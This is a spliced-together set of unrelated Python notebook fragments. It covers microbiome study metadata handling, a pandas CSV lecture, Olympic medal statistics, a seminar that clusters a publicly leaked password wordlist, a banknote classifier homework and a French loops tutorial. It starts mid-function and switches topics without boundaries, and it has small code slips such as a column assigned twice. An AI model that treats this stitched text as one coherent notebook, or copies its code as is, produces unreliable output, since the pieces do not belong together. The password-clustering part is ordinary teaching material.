row['Study'] == "American Gut" : return "USA" if row['Study'] == "Kang2017" or row['Study'] == "kang" : return "USA" if row['Study'] == "Kong2019" or row['Study'] == "kong" : return "USA" else : return row['Country'] def samp_size(row): if row['Study'] == "American Gut" : return 532 if row['Study'] == "Berding2020" : return 52 if row['Study'] == "Cao2021": return 86 if row['Study'] == "Chen2020": return 123 if row['Study'] == "Dan2020": return 286 if row['Study'] == "David2021": return 135 if row['Study'] == "Huang2021": return 83 if row['Study'] == "Fouquier2021": return 78 if row['Study'] == "Kang2017": return 38 if row['Study'] == "Kong2019": return 45 if row['Study'] == "Liu2019": return 50 if row['Study'] == "Son2015": return 103 if row['Study'] == "Zou2020": return 96 if row['Study'] == "Zurita2019": return 50 else : return "NaN" all_meta_merged['Age_Range'] = all_meta_merged.apply (lambda row: add_age(row), axis=1) all_meta_merged['sequencing_depth_min'] = all_meta_merged.apply (lambda row: sequencing_depth_min(row), axis=1) all_meta_merged['seq_depth_range'] = all_meta_merged.apply (lambda row: sequencing_depth_range(row), axis=1) all_meta_merged['Control_relation'] = all_meta_merged.apply (lambda row: control_type_add(row), axis=1) all_meta_merged['Country'] = all_meta_merged.apply (lambda row: Berding_Country(row), axis=1) all_meta_merged['Sample_size'] = all_meta_merged.apply (lambda row: samp_size(row), axis=1) all_meta_merged['Sample_size'] = all_meta_merged.apply (lambda row: Berding_Sample_Size(row), axis=1) all_meta_merged.to_csv("Master_complete_metadata.txt",sep='\t') all_meta_merged['Study'].value_counts()Source truth metadata Load original unprocessed metadata filesamgut = pd.read_csv("./American_gut_metadata.txt",sep='\t',index_col=0) 
berding_source = pd.read_csv("../../Berding_2020/sample_metadata.txt",sep='\t',index_col=0) cao_source = pd.read_csv("../../Cao_2021/sample_metadata.txt",sep='\t',index_col=0) chen_source = pd.read_csv("../../Chen_2020/sample_metadata.txt",sep='\t',index_col=0) dan_source = pd.read_csv("../../Dan_2020/sample_metadata.txt",sep='\t',index_col=0) david_source = pd.read_csv("../../David_2021/sample_metadata.txt",sep='\t',index_col=0) huang_source = pd.read_csv("../../Huang_2021/sample_metadata.txt",sep='\t',index_col=0) fouquier_source = pd.read_csv("../../Fouquier_2021/sample_metadata.txt",sep='\t',index_col=0) kang_source = pd.read_csv("../../Kang_2017/sample_metadata_rf_kang.txt",sep='\t',index_col=0) kong_source = pd.read_csv("../../Kong_2019/sample_metadata.txt",sep='\t',index_col=0) liu_source = pd.read_csv("../../Liu_2019/sample_metadata.txt",sep='\t',index_col=0) son_source = pd.read_csv("../../Son_2015/sample_metadata.txt",sep='\t',index_col=0) zou_source = pd.read_csv("../../Zou_2020/sample_metadata.txt",sep='\t',index_col=0) zurita_source = pd.read_csv("../../Zurita_2019/sample_metadata.txt",sep='\t',index_col=0) kang_source = kang_source.drop(kang_source.loc[kang_source["collection-method"]=="swab"].index) amgut = amgut.drop(amgut.loc[amgut["Sex"]=="LabControl test"].index) zurita_source['Age'] = pd.to_numeric(zurita_source['Age'], errors='coerce') all_original = [amgut, berding_source, cao_source, chen_source, dan_source, david_source, huang_source, fouquier_source, kang_source, kong_source, liu_source, son_source, zou_source, zurita_source] all_original_merged = pd.concat(all_original) all_original_merged ground_truth = all_original_merged[['Age','Sex','Status','Study','Variable_Region','Control_Type','Cohort', 'Subjects_Location']]Define metadata formatting functionsdef country(row): if row['Study'] == "American Gut" : return "USA" if row['Study'] == "Berding2020" : return "USA" if row['Study'] == "Cao2021": return "China" if row['Study'] == "Chen2020": return "China" if row['Study'] == "Dan2020": return "China" if row['Study'] == "David2021": return "USA" if row['Study'] == "Huang2021": return "China" if row['Study'] == "Fouquier2021": return "USA" if row['Study'] == "Kang2017": return "USA" if row['Study'] == "Kong2019": return "USA" if row['Study'] == "Liu2019": return "China" if row['Study'] == "Son2015": return "USA" if row['Study'] == "Zou2020": return "China" if row['Study'] == "Zurita2019": return "Equador" else : return 'NaN' def Study(row): if row['Study'] == "Berding2020" : return row['Study'] if row['Study'] == "American Gut" : return row['Study'] else : return row['Cohort'] # Apply formatting columns to merged metadata file ground_truth['Age'] = pd.to_numeric(ground_truth['Age'], errors='coerce') ground_truth['Age_Range'] = ground_truth.apply (lambda row: add_age(row), axis=1) ground_truth['sequencing_depth_min'] = ground_truth.apply (lambda row: sequencing_depth_min(row), axis=1) ground_truth['seq_depth_range'] = ground_truth.apply (lambda row: sequencing_depth_range(row), axis=1) ground_truth['Control_relation'] = ground_truth.apply (lambda row: control_type_add(row), axis=1) ground_truth['Study'] = ground_truth.apply (lambda row: Study(row), axis=1) ground_truth['country'] = ground_truth.apply (lambda row: country(row), axis=1) ground_truth.index.name = '#SampleID' # Remove unwanted columns del ground_truth["Cohort"] del ground_truth["Subjects_Location"] ground_truthExport file to plot figure 1 in R studio.ground_truth.to_csv("ground_truth.txt", sep='\t')In this 
course, we'll largely be using smaller or moderate-sized datasets. A common workflow is to read the dataset in, usually from an external file, then begin to clean and manipulate the dataset for analysis. In this lecture, I'm going to demonstrate how you can load data from a comma separated file and into a DataFrame.#Let's just jump right in and talk about comma-separated files. You've undoubtedly used these. Any Spreadsheet software like #Excel or Google sheets can save output in CSV format. It's a pretty loose as a format and it's incredibly lightweight, and #it's totally ubiquitous. #Now, I'm going to make a quick aside because it's convenient here. The Jupyter Notebooks use iPython as the kernel underneath #which provides convenient ways to integrate lower-level shell commands, which are programs run in the underlying operating #system. If you're not familiar with the shell, don't worry too much about this. But if you are, this is super handy for #integration of your data science workflows. I want to use one shell command here called "cat" for "concatenate", which just #outputs the contents of a file. In iPython, if we prepend the line with an exclamation mark, it will execute the remainder of #the line as a shell command. So let's look at that in the contents of a CSV file. !cat datasets/Admission_Predict.csv #!cat is for linux not windows #We see from the output that there's a list of columns, and that the column identifiers are listed at strings on the first line #of the file. Then, we have rows of the data, all columns are separated by commas. Now, there's lots of oddities with the CSV #file format, and there's no one agreed upon specification or standard. So you should be prepared to do a little bit of work #when you pull down CSV files to explore. But this lecture isn't focused on CSV files per se, and is more about Pandas #DataFrames. So let's jump into that. #Let's bring in Pandas to work with: import pandas as pd #Pandas makes it easy to turn a CSV into a DataFrame. We just call the read_csv () function. df = pd.read_csv('datasets/Admission_Predict.csv') #Note here we're not calling anything on the DataFrame, we're calling it on the Pandas module. Let's look at a few of the first #rows: df.head() #We notice that by default, the index starts with 0 while the students serial numbers starts from one. If you jump back to the #CSV output, you'll deduce the Pandas has created a new index. Instead, we can set the serial number as the index if we want to #by using the index_col: df = pd.read_csv('datasets/Admission_Predict.csv', index_col=0) df.head() #Notice that we have two columns, SOP and LOR, and probably not everybody knows what they mean. So let's change our column names #to make it more clear. In Pandas, we can use the rename() function. It takes a parameter called columns, and we need to pass in #a dictionary which are the keys of the old column name and the value of the corresponding new column name: new_df=df.rename(columns={'GRE Score':'GRE Score', 'TOEFL Score':'TOEFL Score', 'University Rating':'University Rating', 'SOP':'Statement of Purpose', 'LOR':'Letter of Recommendation', 'CGPA':'CGPA', 'Research':'Research', 'Chance of Admit':'Chance of Admit'}) new_df.head() #From the output, we can see that only the "SOP" has changed, but not "LOR". So why is that? So let's investigate this a bit. #First, we need to make sure we've got all the column names correct. 
We can use the columns attribute of the DataFrame to get a #list: new_df.columns #If we look closely at the output, we can see that there's actually a space right after "LOR" and a space right after "chance of #admit". So this is why our renamed dictionary does not work for LOR because the key that we used is just three characters #instead of four characters, "LOR ". #There's a couple of ways that we could address this. One way would be the change of column by including the space in the new #name: new_df=new_df.rename(columns={'LOR ': 'Letter of Recommendation'}) new_df.head() #So that works well, but it's a bit fragile. What if that was a tab instead of a space or two spaces? Another way is to create #some function that does the cleaning, and then tell renamed to apply that function across all of the data. Python comes with a #handy string function to strip white space called "strip()". When we pass this into rename, we pass the function as the mapper #parameter, and then indicate whether the axis should be the columns, or the index(row labels). So here's an example: new_df=new_df.rename(mapper=str.strip, axis='columns') #So new_df equals new_df.rename. We pass in the mapper, and in this case we're passing in a reference to a function. So #str.strip. We're not calling the function, we're just passing a reference to that function, and Pandas will call it. We tell #the axis that we want it to call this on is across the columns not rows. Now, let's take a look at the results. new_df.head() #Now, we've got it. Both SOP and LOR had been renamed and chance of admit has been trimmed up. Remember though that the rename #function isn't modifying the DataFrame. In this case, df is the same as it always was. There's just a copy of new_df with the #change names: df.columnsSo if we do df.columns, we can see that those still include our columns that are poorly named with lots of extra white space. I'll be honest, these white spaces in column names, this is really common. You'll be doing this anytime you're importing a CSV having to tweak out extra white space.#We can also use the df.columns attribute by assigning it to a list of column names which will directly rename the columns. #This will directly modify the original DataFrame, and it's very efficient especially when you have a lot of columns and you #only want to change a few. This technique is also not affected by subtle errors in the column names, a problem that we just #encountered. With a list, you could just use the list index to change a certain value or use a list comprehension to change all #of the values. #So as an example, let's change all of the values of the column names to lowercase. So first, we need to get our lists: cols = list(df.columns) #So df.columns is actually an indexing variable, and I just want to convert it to a list. #Then, I'm going to write a little list comprehension. So I'll make col is equal to and then I start my list comprehension. In #there, I want to say x.lower.strip. So I'm going to convert X to lowercase, then call strip on it where x is a string and for x #and calls. cols = [x.lower().strip() for x in cols] #So we're just iterating over everything in cols. 
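#EDITOR'S ASIDE (an alternative sketch, not part of the original lecture): the same clean-up can be done
#without assigning to df.columns, by building the mapping with a dict comprehension and passing it to rename():
cleaned = df.rename(columns={c: c.lower().strip() for c in df.columns})
cleaned.columns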
#Then, we just want to overwrite what is already in the.columns attributes df.columns=cols #then let's take a look at our results df.head()**Summer Olympics Data Analysis** 🔘 ***`Importing necessary Libraries`***import pandas as pd # for data analysis and manipulation import numpy as np # for faster access operations with arrays import matplotlib.pyplot as plt # for plotting graphs🔘 ***`Reading and displaying original data from the summer olympics csv file`***df= pd.read_csv("summer.csv") # df is short for 'data-frame'; # stores data from csv file in the form of data-frame df🔘 ***`Fetching only the first 5 records/rows from the dataset`***df.head()🔘 ***`Dimensions of the whole dataset`***df.shape🔘 ***`Analyzing presence of any NULL values in the dataset (column wise)`***df.isnull().sum()**Analysis and Insights from the dataset so far** **1. In how many cities Summer Olympics is held so far?**print("Answer :",len(df['City'].unique()), end="\n\n")Answer : 22**2. Names of all Cities with their Medal Counts in Summer Olympics**for city in df['City'].unique(): print (f"{city}: {len(df[df['City']==city])}", end="\n\n")Athens: 2149 Paris: 1396 St Louis: 470 London: 3567 Stockholm: 885 Antwerp: 1298 Amsterdam: 710 Los Angeles: 2074 Berlin: 875 Helsinki: 889 Melbourne / Stockholm: 885 Rome: 882 Tokyo: 1010 Mexico: 1031 Munich: 1185 Montreal: 1305 Moscow: 1387 Seoul: 1546 Barcelona: 1705 Atlanta: 1859 Sydney: 2015 Beijing: 2042**2.Which sport is having most number of GOLD MEDALS so far?(Top 5)**gold_medal = df[df.Medal=="Gold"] gold_medals_sports = gold_medal.groupby("Sport").count()["Medal"].sort_values(ascending=False).head() gold_medals_sports # Showing data in graphical form print() gold_medals_sports.plot(x='Sports', y='Gold Medals', kind='bar',ylabel = 'Number of Gold Medals', figsize = (10,5), title = 'Top 5 Sports with highest no. of Gold Medals', color = 'red')**3. Which sport is having most number of medals so far? (Top 5)**medals_sports = df.groupby('Sport').count()['Medal'].sort_values(ascending = False).head() medals_sports # Showing data in graphical form print() medals_sports.plot(x='Sports', y='Medals', kind='bar', ylabel = 'Number of Medals', figsize = (10,5), title = 'Top 5 Sports with highest number of Medals', color = 'grey')**4. Which Player has won the most number of Medals? (Top 5)**player_medals = df.groupby('Athlete').count()['Medal'].sort_values(ascending = False).head() player_medals # Showing data in graphical form print() player_medals.plot(x='Athlete', y='Medals', kind='bar', ylabel= 'Number of Medals', figsize = (10,5), title = 'Most Medals won by Athletes', color = 'green')**5. Which player has won the most number of GOLD MEDALS? (Top 5)**gold_medal = df[df["Medal"]=='Gold'] player_gold_medals = gold_medal.groupby("Athlete").count()["Medal"].sort_values(ascending= False).head() player_gold_medals #Showing data in graphical form print() player_gold_medals.plot(x='Athletes', y='Medals', kind='bar', ylabel= 'Number of Medals', figsize = (10,5), title = 'Most Gold Medals won by Athletes', color = 'brown')**6. In which year did India win its first Gold Medal in Summer Olympics?**df_gold = df[df["Medal"]=="Gold"] df_India = df_gold[df_gold['Country'] == 'IND'] print(f"Answer: {df_India['Year'].min()}",end = "\n\n")Answer: 1928**7. Which Event is most popular in terms of number of players? 
(Top 5)**event = df.groupby('Event').count()['Athlete'].sort_values(ascending = False).head() event # graphical representation print() event.plot(x='Event', y='Number of Players', kind='bar', ylabel= 'Number of Players', figsize = (10,5), title = 'Most popular events in Athletes', )**8. Which sport is having most Female Gold Medalists? (Top 5)**df_female = df_gold[df_gold['Gender'] == 'Women'] female_gold_sports = df_female.groupby('Sport')['Gender'].count().sort_values(ascending = False).head() female_gold_sports # graphical representation print() female_gold_sports.plot(x='Sport', y='Number of FemalePlayers', kind='bar', ylabel= 'Number of Female Players', figsize = (10,5), title = 'Nunber of Female Athletes in Top 5 Sports', color = 'indigo')Seminar 10. Clustering Hands-on practice Similar password detectionIn this assignment we will try to detect similar patterns in passwords that people use all over the internet.The input data is a collection of leaked passwords and it can be downloaded from here https://github.com/ignis-sec/Pwdb-Public/tree/master/wordlistsThe task is to try to describe the data in terms of clustering: what are the groups of passwords that look quite similar or have similar logic behind them?This seminar should be considered as a research: there are no correct answers, no points and no deadlines - just your time and your experiments with clustering algorithms.We suggest to start with the following steps:- download the data- check if your favourite password is in the database- build a distance matrix using Levenstein distance- apply DBSCAN- apply Agglomerative clustering and examine the dendrogram- experiment with hyperparameters and the distance function- look for more dependencies and password patternsimport numpy as np import re from pylev import levenshtein from sklearn.cluster import DBSCAN, KMeans import matplotlib.pyplot as plt words_1M = [] with open("data/ignis-1M.txt", "r") as file: for line in file: words_1M.append(line.strip()) words_1K = [] with open("data/ignis-1K.txt", "r") as file: for line in file: words_1K.append(line.strip()) words = np.array(words_1M[:1000]).reshape((-1, 1))Introduce a distance-matrix:import numpy as np from pylev import levenshtein X = np.zeros((words.shape[0], words.shape[0])) for i,x in enumerate(words[:, 0]): for j,y in enumerate(words[i:, 0]): X[i, i + j] = levenshtein(x, y) X[i + j, i] = X[i, i + j] plt.imshow(X, cmap="Purples") plt.show() eps = 2.0 min_samples = 4 db = DBSCAN(eps=eps, metric="precomputed", min_samples=min_samples).fit(X) labels = db.labels_ len(set(labels)) clusters = {} sizes = {} for label in set(labels): cluster = words[labels == label, 0] sizes[label] = len(cluster) clusters[label] = cluster sizes_list = np.array(sorted([(x, y) for x,y in sizes.items()], key=lambda x: x[1], reverse=True)) plt.title("Cluster sizes") plt.bar(sizes_list[:, 0], sizes_list[:, 1]) plt.show() n_top_clusters_to_plot = 1 sizes_to_plot = sizes_list[n_top_clusters_to_plot:, ] sizes_to_plot = sizes_to_plot[sizes_to_plot[:, 1] > min_samples] print("{} clusters cover {} passwords from {}".format( sizes_to_plot.shape[0], sum(sizes_to_plot[:, 1]), words.shape[0] )) for x in sizes_to_plot: print(x[1], clusters[x[0]][:8]) from scipy.cluster import hierarchy from scipy.spatial.distance import pdist condensed_X = pdist(X) linkage = hierarchy.linkage(condensed_X, method="complete") linkage.shape plt.figure(figsize=(16, 16)) dn = hierarchy.dendrogram(linkage) plt.show() from sklearn.cluster import AgglomerativeClustering cluster = 
AgglomerativeClustering(n_clusters=5, affinity='precomputed', linkage='complete') Y = cluster.fit_predict(X) from collections import Counter Counter(Y) words[Y == 4][:10] # !pip3 install -U strsimpy from strsimpy.weighted_levenshtein import WeightedLevenshtein def insertion_cost(char): return 1.0 def deletion_cost(char): return 1.0 def substitution_cost(char_a, char_b): if char_a == 't' and char_b == 'r': return 0.5 return 1.0 weighted_levenshtein = WeightedLevenshtein( substitution_cost_fn=substitution_cost, insertion_cost_fn=insertion_cost, deletion_cost_fn=deletion_cost) print(weighted_levenshtein.distance('Stting1', 'String1')) print(weighted_levenshtein.distance('String1', 'Stting1'))1.0Kmeans and embeddingsimport gensim.downloader list(gensim.downloader.info()['models'].keys()) word_embeddings = gensim.downloader.load("glove-wiki-gigaword-100") part_word_emb_names = [] part_word_emb_values = [] for word in words[:, 0]: if word in word_embeddings: part_word_emb_names.append(word) part_word_emb_values.append(word_embeddings[word]) len(words), len(part_word_emb_names) part_word_emb_names[:25] from sklearn.cluster import KMeans from sklearn.decomposition import PCA pca = PCA(n_components=2) pca_words = pca.fit_transform(part_word_emb_values) pca_words.shape plt.scatter(pca_words[:, 0], pca_words[:, 1]) plt.title("621 Embeddings PCA") plt.show() embeddings_clusters = KMeans(n_clusters=3).fit_predict(part_word_emb_values) Counter(embeddings_clusters) for i in range(len(set(embeddings_clusters))): plt.scatter(pca_words[embeddings_clusters == i, 0], pca_words[embeddings_clusters == i, 1], label=i) plt.legend() plt.title("621 Embeddings PCA") plt.show() for i in range(len(set(embeddings_clusters))): print(i) for word in np.array(part_word_emb_names)[embeddings_clusters == i][:5]: print(word) print("---")0 dragon football killer shadow master --- 1 ashley princess michael daniel charlie --- 2 123456789 password 15 1234 ---Question1bk = pd.read_csv('./data_banknote_authentication.csv') bk = bk.rename({'class':'Class'}, axis='columns') color = [] for c in bk.Class: if c == 0: color.append('Green') else: color.append('red') bk['Color'] = color bk0 = bk[bk.Class == 0] bk1 = bk[bk.Class == 1] print(bk0.describe()) print() print(bk1.describe()) print() print(bk.describe())variance skewness curtosis entropy Class count 762.000000 762.000000 762.000000 762.000000 762.0 mean 2.276686 4.256627 0.796718 -1.147640 0.0 std 2.019348 5.138792 3.239894 2.125077 0.0 min -4.285900 -6.932100 -4.941700 -8.548200 0.0 25% 0.883345 0.450063 -1.709700 -2.228250 0.0 50% 2.553100 5.668800 0.700605 -0.552380 0.0 75% 3.884450 8.691975 2.652925 0.423257 0.0 max 6.824800 12.951600 8.829400 2.449500 0.0 variance skewness curtosis entropy Class count 610.000000 610.000000 610.000000 610.000000 610.0 mean -1.868443 -0.993576 2.148271 -1.246641 1.0 std 1.881183 5.404884 5.261811 2.070984 0.0 min -7.042100 -13.773100 -5.286100 -7.588700 1.0 25% -3.061450 -5.810025 -1.357500 -2.458375 1.0 50% -1.806100 0.172775 0.373720 -0.661650 1.0 75% -0.541770 3.[...]Question2# Split data and pairplot ## bk0 x0 = bk0[['variance', 'skewness', 'curtosis', 'entropy']] y0 = bk0[['Class']] x0Train, x0Test, y0Train, y0Test = train_test_split(x0, y0, test_size=0.5, random_state=0) f0 = sns.pairplot(x0Train) f0.fig.suptitle("class 0") ## bk1 x1 = bk1[['variance', 'skewness', 'curtosis', 'entropy']] y1 = bk1[['Class']] x1Train, x1Test, y1Train, y1Test = train_test_split(x1, y1, test_size=0.5, random_state=0) f1 = sns.pairplot(x1Train) 
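# Editor's aside (a sketch, not part of the original assignment): the two classes can also be compared
# in a single figure by colouring one pairplot of bk by its Class column.
f_both = sns.pairplot(bk[['variance', 'skewness', 'curtosis', 'entropy', 'Class']], hue='Class')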
f1.fig.suptitle("class 1") # easy model f = plt.figure() f.set_size_inches(12,24) ## variance va = f.add_subplot(4,2,1) a0 = x0Train.variance a1 = x1Train.variance va.plot(a0, np.zeros_like(a0) + 0, '.', color = 'green') va.plot(a1, np.zeros_like(a1) + 0.1, '.', color = 'red') va.set_title('variance') vah = f.add_subplot(4,2,2) vah.hist(a0, color='green') vah.hist(a1, color = 'red', alpha=0.3) vah.set_title('variance') ## skewness sk = f.add_subplot(4,2,3) a0 = x0Train.skewness a1 = x1Train.skewness sk.plot(a0, np.zeros_like(a0) + 0, '.', color = 'green') sk.plot(a1, np.zeros_like(a1) + 0.1, '.', color = 'red') sk.set_title('skewness') skh = f.add_subplot(4,2,4) skh.hist(a0, color='green') skh.hist(a1, color = 'red', alpha=0.3) skh.set_title('skewness') ## curtosis cu = f.add_subplot(4,2,5) a0 = x0Train.curtosis a1 = x1Train.curtosis cu.plot(a0, np.zeros_like(a0) + 0, '.', color = 'green') cu.plot(a1, np.zeros_like(a1) + 0.1, '.', color = 'red') cu.set_title('curtosis') cuh = f.add_subplot(4,2,6) cuh.hist(a0, color='green') cuh.hist(a1, color = 'red', alpha=0.3) cuh.set_title('curtosis') ## entropy en = f.add_subplot(4,2,7) a0 = x0Train.entropy a1 = x1Train.entropy en.plot(a0, np.zeros_like(a0) + 0, '.', color = 'green') en.plot(a1, np.zeros_like(a1) + 0.1, '.', color = 'red') en.set_title('entropy') enh = f.add_subplot(4,2,8) enh.hist(a0, color='green') enh.hist(a1, color = 'red', alpha=0.3) enh.set_title('entropy') # Predict lable x = bk[['variance', 'skewness', 'curtosis', 'entropy']] y = bk[['Class']] xTrain, xTest, yTrain, yTest = train_test_split(x, y, test_size=0.5, random_state=0) yPredict = [] for v in xTest.variance: if v >= 0 : yPredict.append(0) else: yPredict.append(1) # True False tp = 0 tn = 0 fp = 0 fn = 0 acc = 0 for (p, t) in zip(yPredict, yTest.Class): if p == 0 and t == 0: tp += 1 elif p == 1 and t == 1: tn += 1 elif p == 0 and t == 1: fp += 1 elif p == 1 and t == 0: fn += 1 if p == t: acc = acc + 1 print("TP:{} FP:{} TN:{} FN:{} TPR:{} TNR:{} Accuracy:{}".format(tp, fp, tn, fn, tp/(tp + fn), tn/(tn + fp), acc / len(yPredict))) ## Confusion Matrix I choose # 0 is good 1 is bad temp = confusion_matrix(yTest, yPredict) print(temp) tn = temp[0][0] fn = temp[1][0] tp = temp[1][1] fp = temp[0][1] tpr = tp / (tp + fn) tnr = tn / (tn + fp) print('TPR = {}, TNR = {}, tp fp tn fn = {} {} {} {}'.format(tpr, tnr, tp, fp, tn, fn))Qestion3# KNN kList = [3,5,7,9,11] accuracy = [] for k in kList: knn = KNeighborsClassifier(n_neighbors=k) knn.fit(xTrain, yTrain) yPredict = knn.predict(xTest) accuracy.append(accuracy_score(yTest, yPredict)) plt.plot(kList, accuracy) print(accuracy) # k = 7 is optimal knn = KNeighborsClassifier(n_neighbors=7) knn.fit(xTrain, yTrain) yPredict = knn.predict(xTest) # True False tp = 0 tn = 0 fp = 0 fn = 0 acc = 0 for (p, t) in zip(yPredict, yTest.Class): if p == 0 and t == 0: tp += 1 elif p == 1 and t == 1: tn += 1 elif p == 0 and t == 1: fp += 1 elif p == 1 and t == 0: fn += 1 if p == t: acc = acc + 1 print("TP:{} FP:{} TN:{} FN:{} TPR:{} TNR:{} Accuracy:{}".format(tp, fp, tn, fn, tp/(tp + fn), tn/(tn + fp), acc / len(yPredict))) # BU ID 64501194 # Take 1 1 9 4 x = {'variance':[1], 'skewness':[1], 'curtosis':[9], 'entropy':[4]} x = pd.DataFrame.from_dict(x) ## my simple classifier yPredict = 1 print("my simple classifier: {}".format(yPredict)) ## for best knn knn = KNeighborsClassifier(n_neighbors=7) knn.fit(xTrain, yTrain) yPredict = knn.predict(x) print("knn(n=7): {}".format(yPredict))my simple classifier: 1 knn(n=7): [0]Les bouclesLes boucles sont un 
type de contrôle de flux dans un programme. We saw that **conditionals (alternatives) let us execute one or more statements when a condition is met**. Loops, in turn, let us repeat one or more statements. The `while` loopThe `while` loop executes one or more statements repeatedly for as long as a condition remains true.max_age = 30 age = 1 while age < max_age: # As long as age < max_age, execute the code that follows. print(f"L'age {age} est inférieur à {max_age}") age = age + 1L'age 1 est inférieur à 30 L'age 2 est inférieur à 30 L'age 3 est inférieur à 30 L'age 4 est inférieur à 30 L'age 5 est inférieur à 30 L'age 6 est inférieur à 30 L'age 7 est inférieur à 30 L'age 8 est inférieur à 30 L'age 9 est inférieur à 30 L'age 10 est inférieur à 30 L'age 11 est inférieur à 30 L'age 12 est inférieur à 30 L'age 13 est inférieur à 30 L'age 14 est inférieur à 30 L'age 15 est inférieur à 30 L'age 16 est inférieur à 30 L'age 17 est inférieur à 30 L'age 18 est inférieur à 30 L'age 19 est inférieur à 30 L'age 20 est inférieur à 30 L'age 21 est inférieur à 30 L'age 22 est inférieur à 30 L'age 23 est inférieur à 30 L'age 24 est inférieur à 30 L'age 25 est inférieur à 30 L'age 26 est inférieur à 30 L'age 27 est inférieur à 30 L'age 28 est inférieur à 30 L'age 29 est inférieur à 30In a `while` loop it is important to update the condition as the code runs, otherwise the loop runs forever.
```python
max_age = 30
age = 1
while age < max_age:
    print(f"L'age {age} est inférieur à {max_age}")
```
If I remove the statement `age = age + 1`, then on every pass through the loop we still have age < max_age. The condition is always true, so the print statement will execute indefinitely.msg = input() msg = "" while not "bonjour" in msg: print("Bonjour") msg = input()BonjourThe `for` loop In Python the for loop iterates over the elements of a sequence (which can be a list, a string, …), in the order in which they appear in the sequence.# To declare a list cours = ["Economie", "Biologie", "Chimie"] type(cours) numero = "08-03-05-11" numero.split("-") type(numero) fruits = ["pomme", "ananas", "goyave", "mangue"] # We declare an iteration variable # assigned to each element of the sequence. # The advantage is that we do not need to know how many # elements there are in the sequence for el in fruits: print(el) "Il a dit \"Bonjour\" " 'Il a dit "Bonjour" ' emails = ["", "", ""] # Get the mail providers for mail in emails: print(f"Le service mail est : {mail.split('@')[1]}") print(f"Le prénom est : {mail.split('@')[0]}") "".split("@") mail = "".split("@") print(mail[0]) mail print(mail[1]) fruits = ("pomme", "ananas", "goyave", "mangue") # the type of the sequence does not matter # list, tuple, dictionary ... for el in fruits: print(el) print(el.split("o"))pomme ['p', 'mme'] ananas ['ananas'] goyave ['g', 'yave'] mangue ['mangue']The `range()` function lets us generate a sequence of numbers.
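As a small aside (not in the original notebook), `range()` also accepts a third `step` argument, so `range(start, stop, step)` can count in steps other than one:
```python
list(range(0, 20, 2))   # even numbers from 0 to 18
list(range(10, 0, -1))  # counting down from 10 to 1
```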
We can generate a sequence of numbers to iterate over.range(10) list(range(10)) # Example: generate a sequence of 20 consecutive numbers # range(n) creates the sequence 0 .. n-1 list(range(1, 21)) # We can choose the start and the end list(range(10, 25)) # We can iterate like this print(list(range(20))) for i in range(20): print(f"Le nombre actuel est {i}")[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19] Le nombre actuel est 0 Le nombre actuel est 1 Le nombre actuel est 2 Le nombre actuel est 3 Le nombre actuel est 4 Le nombre actuel est 5 Le nombre actuel est 6 Le nombre actuel est 7 Le nombre actuel est 8 Le nombre actuel est 9 Le nombre actuel est 10 Le nombre actuel est 11 Le nombre actuel est 12 Le nombre actuel est 13 Le nombre actuel est 14 Le nombre actuel est 15 Le nombre actuel est 16 Le nombre actuel est 17 Le nombre actuel est 18 Le nombre actuel est 19`%`: modulo. It returns the remainder of an integer division.4/2 4 % 2 # If 4 is divided by 2 we get a whole number 4/3 4%3 50/19 19 * .6315789473684212 x = 50 - 19 x = x- 19 print(x) 50 == 2 * 19 + 12 20 % 10 x = 20 x = x - 10 x = x - 10 print(x) 50%19 print(list(range(40))) print() for i in range(40): if i%2==0: print(f"Le nombre pair est {i}")[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39] Le nombre pair est 0 Le nombre pair est 2 Le nombre pair est 4 Le nombre pair est 6 Le nombre pair est 8 Le nombre pair est 10 Le nombre pair est 12 Le nombre pair est 14 Le nombre pair est 16 Le nombre pair est 18 Le nombre pair est 20 Le nombre pair est 22 Le nombre pair est 24 Le nombre pair est 26 Le nombre pair est 28 Le nombre pair est 30 Le nombre pair est 32 Le nombre pair est 34 Le nombre pair est 36 Le nombre pair est 38Application: computing the mean, variance, standard deviation and covariance Data Consider the distribution of the students' heights:tailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] somme = 0 n = 0 for taille in tailles: n = n+1 somme = somme + taille #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n print(f"La moyenne est {moyenne}") tailles = [1.90, 1.75, 0, 0, 1.88, 1.87, 2.04, 1.65, 1.77, 0, 1.78, 1.81, 1.79] somme = 0 n = 0 # Compute the mean but exclude the zeros for taille in tailles: if taille != 0: n = n+1 somme = somme + taille #print(f"La valeur actuelle de somme est : {somme}") print() moyenne = somme / n print(f"La moyenne est {moyenne}") print(f"Taille initiale de la liste : {len(tailles)}") print(f"Taille finale de la liste : {n}")La moyenne est 1.8239999999999998 Taille initiale de la liste : 13 Taille finale de la liste : 10**Computing the mean:** As a reminder, the formula for the mean is $\bar{x} = \frac{1}{n}\sum_{i=1}^{n} x_i$ ![](images/moyenne.jpg) **Computing the variance:** As a reminder, the formula for the variance is $\sigma^2 = \frac{1}{n}\sum_{i=1}^{n}(x_i - \bar{x})^2$ ![](images/variance-formula.png)tailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79] # Proposal from Sarah somme = 0 n = 0 sommesqEM = 0 for taille in tailles: n = n+1 somme = somme + taille print() moyenne = somme / n print(f"La moyenne est {moyenne}") print() for taille in tailles : sqEM = (taille - moyenne)**2 #print(f"l'écart à la moyenne au carré est {sqEM}") sommesqEM = sommesqEM + sqEM #print(f"la somme des carrés des EM est {sommesqEM}") print() variance = sommesqEM / n print(f"la variance est {variance}")La moyenne est 1.8239999999999998 la variance est 0.009964**Computing the standard deviation:** The standard deviation is equal to the square root of the variance.
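As a cross-check (an editor's aside, not part of the original notebook), the standard library `statistics` module computes the same population statistics directly; the results should match the values obtained by hand above.
```python
import statistics

tailles = [1.90, 1.75, 1.88, 1.87, 2.04, 1.65, 1.77, 1.78, 1.81, 1.79]
print(statistics.mean(tailles))       # mean, about 1.824
print(statistics.pvariance(tailles))  # population variance (divides by n), about 0.009964
print(statistics.pstdev(tailles))     # population standard deviation
```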
